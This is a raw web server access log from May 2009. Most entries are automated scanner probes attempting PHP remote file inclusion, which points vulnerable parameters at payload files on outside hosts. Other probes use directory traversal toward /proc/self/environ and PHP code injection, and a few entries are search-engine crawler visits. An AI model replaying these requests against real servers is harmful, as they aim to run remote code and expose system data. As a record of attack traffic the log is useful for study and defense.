72.249.157.90 - - [13/May/2009:09:11:20 -0500] "GET /logs//?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 189195 "-""XXXXXX"
67.204.0.222 - - [13/May/2009:09:11:59 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:11:59 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:12:45 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:12:46 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
89.149.241.210 - - [13/May/2009:09:13:45 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 335 "-""libwww-perl/5.806"
89.149.241.210 - - [13/May/2009:09:13:46 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 330 "-""libwww-perl/5.806"
66.249.67.180 - - [13/May/2009:09:16:31 -0500] "GET /logs/access_log.1198108800 HTTP/1.1" 200 1615 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.97.132.101 - - [13/May/2009:09:18:04 -0500] "GET /logs/errors.php?error=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 286 "-""libwww-perl/5.53"
212.97.132.101 - - [13/May/2009:09:18:04 -0500] "GET /errors.php?error=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 281 "-""libwww-perl/5.53"
200.58.119.65 - - [13/May/2009:09:18:38 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.814"
200.58.119.65 - - [13/May/2009:09:18:39 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.814"
203.173.40.87 - - [13/May/2009:09:19:50 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
203.173.40.87 - - [13/May/2009:09:19:51 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
122.200.150.250 - - [13/May/2009:09:20:03 -0500] "GET /environment.php?DIR_PREFIX=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
123.125.64.38 - - [13/May/2009:09:20:09 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.27.203.107 - - [13/May/2009:09:21:25 -0500] "GET /environment.php?DIR_PREFIX=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [13/May/2009:09:21:26 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.27.203.107 - - [13/May/2009:09:21:26 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.27.203.107 - - [13/May/2009:09:21:34 -0500] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:09:21:44 -0500] "GET /logs/access_log.1204502400 HTTP/1.1" 200 1355 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.249.157.90 - - [13/May/2009:09:23:20 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 200 3245 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
72.249.157.90 - - [13/May/2009:09:23:20 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
72.249.157.90 - - [13/May/2009:09:23:20 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
72.249.157.90 - - [13/May/2009:09:23:21 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
72.249.157.90 - - [13/May/2009:09:23:35 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
72.249.157.90 - - [13/May/2009:09:23:40 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 200 36689 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
72.249.157.90 - - [13/May/2009:09:23:40 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 189195 "-""XXXXXX"
72.249.157.90 - - [13/May/2009:09:23:41 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 189195 "-""XXXXXX"
201.234.41.5 - - [13/May/2009:09:24:06 -0500] "GET /logs/index.php?conteudo=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:09:24:06 -0500] "GET /index.php?conteudo=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
89.149.241.210 - - [13/May/2009:09:25:42 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.806"
89.149.241.210 - - [13/May/2009:09:25:43 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.806"
77.221.130.12 - - [13/May/2009:09:26:32 -0500] "GET /logs/send_reminders.php?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.221.130.12 - - [13/May/2009:09:26:32 -0500] "GET /send_reminders.php?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:09:27:01 -0500] "GET /logs/access_log.1193875200 HTTP/1.1" 200 3981 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.76.47.224 - - [13/May/2009:09:27:13 -0500] "GET /send_reminders.php?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:09:27:13 -0500] "GET /logs/send_reminders.php?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
151.1.154.24 - - [13/May/2009:09:28:08 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/rox.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
151.1.154.24 - - [13/May/2009:09:28:09 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/rox.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
151.1.154.24 - - [13/May/2009:09:28:11 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/rox.jpg?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
151.1.154.24 - - [13/May/2009:09:28:12 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/rox.jpg?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:09:29:40 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.221.130.2 - - [13/May/2009:09:29:41 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:09:29:47 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:29:49 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
203.173.40.87 - - [13/May/2009:09:30:23 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
203.173.40.87 - - [13/May/2009:09:30:24 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:30:45 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:30:46 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
200.58.119.65 - - [13/May/2009:09:31:04 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.814"
200.58.119.65 - - [13/May/2009:09:31:05 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.814"
77.221.130.12 - - [13/May/2009:09:31:26 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
77.221.130.12 - - [13/May/2009:09:31:26 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
200.58.119.65 - - [13/May/2009:09:31:40 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.814"
200.58.119.65 - - [13/May/2009:09:31:41 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
66.249.67.180 - - [13/May/2009:09:32:24 -0500] "GET /logs/access_log.1111622400 HTTP/1.1" 200 125 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.76.47.224 - - [13/May/2009:09:33:27 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
201.76.47.224 - - [13/May/2009:09:33:27 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
67.15.206.26 - - [13/May/2009:09:33:40 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
67.15.206.26 - - [13/May/2009:09:33:40 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
67.15.206.26 - - [13/May/2009:09:33:57 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
67.15.206.26 - - [13/May/2009:09:33:57 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
88.191.18.58 - - [13/May/2009:09:34:16 -0500] "GET //index2.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:09:34:16 -0500] "GET /logs//index2.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:09:34:16 -0500] "GET /logs/access_log.1237593600//index2.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:09:34:18 -0500] "GET //index2.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:09:34:18 -0500] "GET /logs//index2.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:09:34:18 -0500] "GET /logs/access_log.1237593600//index2.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.18.76.16 - - [13/May/2009:09:34:18 -0500] "GET /logs/poll//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:09:34:18 -0500] "GET /poll//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
213.198.76.196 - - [13/May/2009:09:34:19 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
213.198.76.196 - - [13/May/2009:09:34:19 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
212.158.163.65 - - [13/May/2009:09:34:22 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:09:34:22 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
88.191.18.58 - - [13/May/2009:09:34:31 -0500] "GET /logs/access_log.1240185600//index2.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.18.58 - - [13/May/2009:09:34:33 -0500] "GET /logs/access_log.1240185600//index2.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sherif.do.am/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.158.163.65 - - [13/May/2009:09:34:34 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:09:34:34 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
195.93.180.106 - - [13/May/2009:09:34:55 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
195.93.180.106 - - [13/May/2009:09:34:55 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:09:35:48 -0500] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:09:35:48 -0500] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.97.132.101 - - [13/May/2009:09:36:04 -0500] "GET /?DOCUMENT_ROOT=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 200 3233 "-""libwww-perl/5.53"
212.97.132.101 - - [13/May/2009:09:36:10 -0500] "GET /logs/?DOCUMENT_ROOT=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 200 36699 "-""libwww-perl/5.53"
202.89.33.167 - - [13/May/2009:09:36:25 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:09:36:26 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
217.147.29.190 - - [13/May/2009:09:36:57 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
217.147.29.190 - - [13/May/2009:09:36:57 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
201.234.41.5 - - [13/May/2009:09:36:59 -0500] "GET /logs/poll//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:09:37:00 -0500] "GET /poll//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
66.249.67.180 - - [13/May/2009:09:37:37 -0500] "GET /logs/access_log.1149206400 HTTP/1.1" 200 1325 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.204.0.222 - - [13/May/2009:09:38:13 -0500] "GET /logs//site/index.php?option=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:38:13 -0500] "GET //site/index.php?option=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.197.162.90 - - [13/May/2009:09:38:43 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
91.197.162.90 - - [13/May/2009:09:38:44 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
65.17.220.190 - - [13/May/2009:09:39:38 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 344 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
65.17.220.190 - - [13/May/2009:09:39:38 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 339 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
65.17.220.190 - - [13/May/2009:09:39:38 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.17.220.190 - - [13/May/2009:09:39:38 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.17.220.190 - - [13/May/2009:09:39:38 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 344 "-""XXXXXX"
65.17.220.190 - - [13/May/2009:09:39:38 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""XXXXXX"
65.17.220.190 - - [13/May/2009:09:39:38 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 339 "-""XXXXXX"
65.17.220.190 - - [13/May/2009:09:39:39 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 339 "-""XXXXXX"
65.55.106.109 - - [13/May/2009:09:41:22 -0500] "GET /logs/access_log.1223596800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [13/May/2009:09:42:53 -0500] "GET /logs/access_log.1170979200 HTTP/1.1" 200 18532 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.176.64 - - [13/May/2009:09:43:55 -0500] "GET /logs//components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
89.111.176.64 - - [13/May/2009:09:43:55 -0500] "GET //components/com_fpslideshow/index.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
200.69.205.114 - - [13/May/2009:09:44:04 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
200.69.205.114 - - [13/May/2009:09:44:04 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
81.175.71.121 - - [13/May/2009:09:45:53 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:09:45:54 -0500] "GET /logs/access_log.1233705600///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:09:45:54 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 189196 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:09:46:11 -0500] "GET /logs/access_log.1233878400///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
201.232.54.48 - - [13/May/2009:09:46:40 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
201.232.54.48 - - [13/May/2009:09:46:44 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:09:47:49 -0500] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:47:50 -0500] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:47:53 -0500] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:47:53 -0500] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:09:48:12 -0500] "GET /logs/access_log.1171843200 HTTP/1.1" 200 4818 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.103.144 - - [13/May/2009:09:48:16 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.103.144 - - [13/May/2009:09:48:16 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.103.144 - - [13/May/2009:09:48:16 -0500] "GET /logs/access_log.1239235200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.103.144 - - [13/May/2009:09:48:20 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.86.82.88 - - [13/May/2009:09:49:30 -0500] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://10thplanet.com/playlist/scan/id???? HTTP/1.1" 404 329 "-""libwww-perl/5.825"
80.86.82.88 - - [13/May/2009:09:49:30 -0500] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://10thplanet.com/playlist/scan/id???? HTTP/1.1" 404 324 "-""libwww-perl/5.825"
67.15.206.26 - - [13/May/2009:09:49:54 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
67.15.206.26 - - [13/May/2009:09:49:54 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
